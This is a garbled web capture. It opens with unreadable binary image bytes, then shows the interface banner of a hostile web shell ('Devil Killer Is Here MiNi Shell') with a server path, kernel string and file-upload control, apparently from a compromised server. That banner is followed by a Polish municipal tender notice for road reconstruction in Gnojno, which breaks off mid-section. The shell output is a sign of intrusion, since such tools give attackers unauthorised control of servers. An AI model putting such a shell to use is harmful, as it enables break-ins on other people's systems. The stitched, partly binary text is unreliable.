JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/91592-N-2016.html

<p class="kh_header"><b>Gnojno: Przebudowa dróg gminnych i wewnętrznych położonych na terenie gminy Gnojno</b><br>
<b>Numer ogłoszenia: 91592 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gnojno , Gnojno 145, 28-114 Gnojno, woj. świętokrzyskie, tel. 0413532038, faks 0413532038.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminy.com.pl/gnojno/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych i wewnętrznych położonych na terenie gminy Gnojno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie  zadania pn. Przebudowa dróg gminnych i wewnętrznych położonych na terenie gminy Gnojno
Przedmiot zamówienia został podzielony na dwa etapy i następujące zadania
Zadanie nr I. Przebudowa drogi gminnej nr 323 012T Glinka - Wola Bokrzycka
-długość przebudowywanej drogi:1038 m,
-klasa techniczna D,
-prędkość projektowa Vp=30 km/h,
-szerokość jezdni 3,5 m (droga jedno-jezdniowa, dwukierunkowa) nawierzchnia z betonu asfaltowego warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,75 m. gruntowe, z kruszywa,
Zadanie nr II. Przebudowa drogi gminnej położonej na dz. nr ew. 155 i 48 w miejscowości Grabki Małe
Parametry przebudowy drogi
-długość odcinka drogi   325 m,
-klasa techniczna D,
-prędkość projektowa Vp=30 km/h,
-szerokość jezdni 3,5 m (droga jedno-jezdniowa, dwukierunkowa)
 nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,75 m gruntowe, z kruszywa,
-zaprojektowano przekrój drogowy
Zadanie nr III. Przebudowa drogi gminnej położonej na dz. nr ew. 382, 383 w miejscowości Jarząbki
Parametry przebudowy drogi
-długość odcinka przebudowy drogi 930 m,
-klasa techniczna D,
-prędkość projektowa Vp=30km/h,
-szerokość jezdni 3,5 m z poszerzeniem do 4,0 m na odcinku od km 0+464 do km 0+480 ; nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 2 x 0,75 m z kruszywa,
Zadanie nr IV. Przebudowa drogi gminnej położonej na dz. nr ew. 242, 243 w miejscowości Skadla.
Parametry przebudowy drogi
-długość przebudowywanego odcinka drogi : 318 m,
-klasa techniczna D,
-prędkość projektowa Vp = 30 km/h,
-szerokość jezdni 3,5 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,75 m ze zwężeniami  do 0,1-0,5 m, z kruszywa,
Zadanie nr V. Przebudowa drogi gminnej położonej na dz. nr ew. 374 w miejscowości  Wola Bokrzycka
Parametry przebudowy drogi
-długość przebudowywanego odcinka drogi : 1490 m,
-klasa techniczna D,
-prędkość projektowa Vp=30 km/h,
-szerokość jezdni 3,5 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,1-0,75 m  z kruszywa,
Zadanie nr VI. Przebudowa drogi gminnej położonej na dz. nr ew. 55, 624, 631 w msc. Poręba
Parametry przebudowy drogi 
-długość przebudowywanego odcinka drogi : 912m,
-klasa techniczna D,
-prędkość projektowa Vp= 30 km/h,
-szerokość jezdni 3,5-4,5 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
- szerokość poboczy 0,1-0,75 m z kruszywa,
Zadanie nr VII. Przebudowa drogi gminnej nr 323 015T Gnojno - Pisaki
Parametry przebudowy drogi :
- długość przebudowywanego odcinka drogi 965 m,
- klasa techniczna D,
- prędkość projektowa Vp= 30 km/h,
- szerokość jezdni 3,5 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,75 m,  z lokalnymi zwężeniami do 0,1-0,5 m,
Zadanie nr VIII. Przebudowa drogi gminnej położonej na dz. nr ew. 249/8, 863, 72 Skadla - Januszowice
Parametry przebudowy drogi :
-długość przebudowywanego odcinka drogi  1552 m,
-klasa techniczna D,
-prędkość projektowa Vp = 30 km/h,
-szerokość jezdni 3,5 m z poszerzeniem na mijance do 5,0 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,75 m ze zwężeniami do 0,1-0,5 m,  z kruszywa,
Zadanie nr IX. Przebudowa drogi gminnej położonej na dz. nr ew.  181, 235 w miejscowości Zawada
Parametry przebudowy drogi 
-długość przebudowywanego odcinka drogi : 261 m,
-klasa techniczna D,
-prędkość projektowa Vp=30km/h,
-szerokość jezdni 3,5-4,5 m (droga jednopasmowa);nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 2 x 0,75 m ze zwężeniem do 0,25-0,5 m,
-zaprojektowano przekrój jednospadowy ze spadkiem poprzecznym jezdni 2%,
-spadki poprzeczne poboczy przyjęto 8%(rys. nr.3)
-łączna szerokość utwardzonej projektowanej drogi wynosi 5,0-6,0 m, 
Zadanie nr X. Przebudowa drogi gminnej położonej na dz. nr ew.  1339/4 w miejscowości Ruda
Parametry przebudowy drogi :
-długość przebudowywanego odcinka drogi : 160 m,
-klasa techniczna D,
-prędkość projektowa Vp= 30 km/h,
-szerokość jezdni 3,5 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,5 m  z kruszywa,
Zadanie nr XI. Przebudowa drogi gminnej położonej na dz. nr ew.  725, 736/1 w miejscowości Gnojno
Parametry przebudowy drogi :
-długość przebudowywanego odcinka drogi : 429 m,
-klasa techniczna D,
-prędkość projektowa Vp= 30 km/h,
-szerokość jezdni 3,5 - 5,0 m (droga jedno-jezdniowa, dwukierunkowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 0,5 - 0,75 m,
Zadanie nr XII. Przebudowa drogi gminnej  na dz. ew. nr 74, 791, 101 w miejscowości Zawada
Parametry przebudowy drogi :
-długość przebudowywanego odcinka drogi : 1856 m,
-klasa techniczna D,
-prędkość projektowa Vp= 30 km/h,
-szerokość jezdni 3,5 m (droga jednopasmowa); nawierzchnia z betonu asfaltowego, warstwa wiążąca 4 cm,  ścieralna 4 cm
-szerokość poboczy 2 x 0,5 - 0,75 m,
-zaprojektowano przekrój jednospadowy ze spadkiem poprzecznym jezdni 2%,
-spadki poprzeczne poboczy przyjęto 8% (rys. nr.3)
-łączna szerokość utwardzonej projektowanej drogi wynosi 5,0 m
Etap I obejmuje zadania nr I, III i IX. Termin zakończenia realizacji etapu I do dnia 31 październik 2016r.
Etap II obejmuje zadania nr II, IV, V, VI, VII, VIII, X, XI, XII. Termin zakończenia realizacji etapu II do dnia 31 październik 2018r. 

Realizacja zadań II etapu nr zadania II, IV, V, VI, VII, VIII, X, w roku 2017 do dnia 31 październik 2017r. a dla zadań XI, XII w roku 2018 do dnia 31 październik 2018r.
Szczegółowy zakres robót zawiera projekt budowlany załącznik nr 8 do siwz oraz specyfikacja techniczna wykonania i odbioru robót załącznik nr 9 do siwz.
 Wszelkie użyte materiały powinny posiadać certyfikaty i aprobaty techniczne. 
Uwaga:
W przypadku, gdy w opisie zamówienia, w jakiejkolwiek części dokumentacji, rysunkach, specyfikacji technicznej wykonania i odbioru robót, lub innej części SIWZ, zostały wskazane znaki towarowe, patenty, pochodzenie materiałów, urządzeń, dostawców, producenta, bądź przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia prosimy traktować jako informację uściślające, które zostały użyte wyłącznie w celu przybliżenia potrzeb zamawiającego. Zamawiający dopuszcza oferowanie materiałów, rozwiązań, urządzeń równoważnych opisywanym, pod warunkiem, że gwarantują one realizację zamówienia zgodnie z projektem oraz zapewnią uzyskanie parametrów technicznych i funkcjonalno- użytkowych nie gorszych od założonych w wyżej wymienionych dokumentach.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.10.00-8, 45.11.20.00-5, 45.22.11.11-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 77.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną polegającą na  budowie, przebudowie, remoncie dróg o wartości min. 3.000.000,00 zł brutto z podaniem daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.      
Dowodami o których mowa powyżej są  poświadczenia, lub - inne dokumenty - jeżeli         z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
Wartość podana w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane według średniego kursu NBP na dzień złożenia ofert</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. 
Wykonawca  musi dysponować,  jedną osobą, która będzie pełniła obowiązki kierownika budowy posiadając uprawnienia do kierowania robotami budowlanymi w specjalności  drogowej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć:
- informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę 3.000.000,00 zł  wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
- opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę - 3.000.000,00 zł
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają wyżej wymienione warunki w ust.2,3
4. Wykonawca w myśl art. 26 ust. 2b ustawy Pzp może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia,         w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia.
5. Jeżeli podmiot, o którym mowa w ust. 4 jest równocześnie podwykonawcą w rozumieniu art. 36 b ustawy pzp, w przypadku zmiany lub rezygnacji z takiego podwykonawcy wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu, o których mowa        w art. 22 ust. 1 w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenia zamówienia
6. Podmiot, który zobowiązał się do udostępnienia zasobów na podstawie art. 26 ust. 2b ustawy  Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą           w skutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w Rozdziale VI siwz, na zasadzie: spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, pełnomocnictwa- jeżeli dotyczy, dowód wniesienia wadium, kosztorys ofertowy, pisemne zobowiązania innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów tj. wiedzy i doświadczenia, - jeżeli dotyczy; pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
